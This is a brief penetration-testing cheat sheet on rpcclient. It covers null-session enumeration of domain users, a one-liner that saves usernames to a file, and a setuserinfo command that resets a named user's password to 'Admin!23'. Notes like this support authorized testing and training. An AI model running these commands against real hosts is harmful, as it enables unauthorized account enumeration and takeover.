enumerate
rpcclient -U '' -N <ip>
then try enumdomusers,querydispinfo,etc.
enumdomusers
querydispinfo
Only users:
rpcclient -U "" <ip> -N -c "enumdomusers" | grep -oP '\[.*?\]' | grep "0x" -v | tr -d '[]' > userlist.txt
User info can be changed with setuserinfo. To change password:
setuserinfo
setuserinfo christopher.lewis 23 'Admin!23'
Last updated 2 months ago